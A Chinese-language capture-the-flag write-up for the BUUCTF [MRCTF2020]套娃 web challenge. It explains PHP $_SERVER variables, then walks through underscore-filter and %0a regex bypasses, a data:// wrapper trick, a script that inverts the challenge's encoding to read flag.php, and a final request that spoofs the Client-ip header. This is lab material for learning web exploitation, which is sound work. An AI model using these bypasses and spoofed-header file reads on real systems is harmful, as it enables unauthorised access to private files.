BUUCTF [MRCTF2020]套娃
-
!= 与!== 和== ===对应
-
1,http://localhost/aaa/ (打开aaa中的index.php)
结果:
$_SERVER['QUERY_STRING'] = "";
$_SERVER['REQUEST_URI'] = "/aaa/";
$_SERVER['SCRIPT_NAME'] = "/aaa/index.php";
$_SERVER['PHP_SELF'] = "/aaa/index.php";
2,http://localhost/aaa/?p=222 (附带查询)
结果:
$_SERVER['QUERY_STRING'] = "p=222";
$_SERVER['REQUEST_URI'] = "/aaa/?p=222";
$_SERVER['SCRIPT_NAME'] = "/aaa/index.php";
$_SERVER['PHP_SELF'] = "/aaa/index.php";
3,http://localhost/aaa/index.php?p=222&q=333
结果:
$_SERVER['QUERY_STRING'] = "p=222&q=333";
$_SERVER['REQUEST_URI'] = "/aaa/index.php?p=222&q=333";
$_SERVER['SCRIPT_NAME'] = "/aaa/index.php";
$_SERVER['PHP_SELF'] = "/aaa/index.php";
由实例可知:
$_SERVER["QUERY_STRING"] 获取查询 语句,实例中可知,获取的是?后面的值
$_SERVER["REQUEST_URI"] 获取 http://localhost 后面的值,包括/
$_SERVER["SCRIPT_NAME"] **当前脚本的路径,如:index.php
$_SERVER["PHP_SELF"] 当前正在执行脚本的文件名
-
_的过滤 可以用 . 绕过
-
%0a绕过正则
所以第一部分的payload: http://4bc5cdd7-d701-4c49-b9a7-d9368f0abd98.node4.buuoj.cn/?b.u.p.t=23333%0a
页面源码有一个jsfuck的
先看一下jsfuck
还是Merak
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die();
}
function change($v){
$v = base64_decode($v); 1.base64解$v
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 ); 2.$v的每一个字母的ascii加上2*i再转换为此时值对应的ascii字符 然后与之前的$re拼接
}
return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp(); 这个函数用的一般只有XFF和Client-ip这两种方法
if($ip!='127.0.0.1') 要求必须ip为127.0.0.1
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' 可以使用data:// 来进行转换){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>
file_get_contents($_GET['2333']) === 'todat is a happy day'可以通过这个方法
参考:https://www.php.cn/manual/view/285.html
data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=
根据change函数写个生成payload的脚本
<?php
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
function changeRE($v){
/*生成可以转为正常payload的函数
*/
$re='';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) - $i*2 );
}
return $re;
}
echo(base64_encode(changeRE('flag.php')));
?>
注意:这里的两个参数都是通过get参数传的,我用post传了好几次才发现
file=ZmpdYSZmXGI=
最终的payload:
POST /secrettw.php?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=ZmpdYSZmXGI= HTTP/1.1
Host: 4bc5cdd7-d701-4c49-b9a7-d9368f0abd98.node4.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://56944923-d8f9-4d5b-b169-ab8dceb2eced
Connection: close
Client-ip: 127.0.0.1
这三个参数是修改的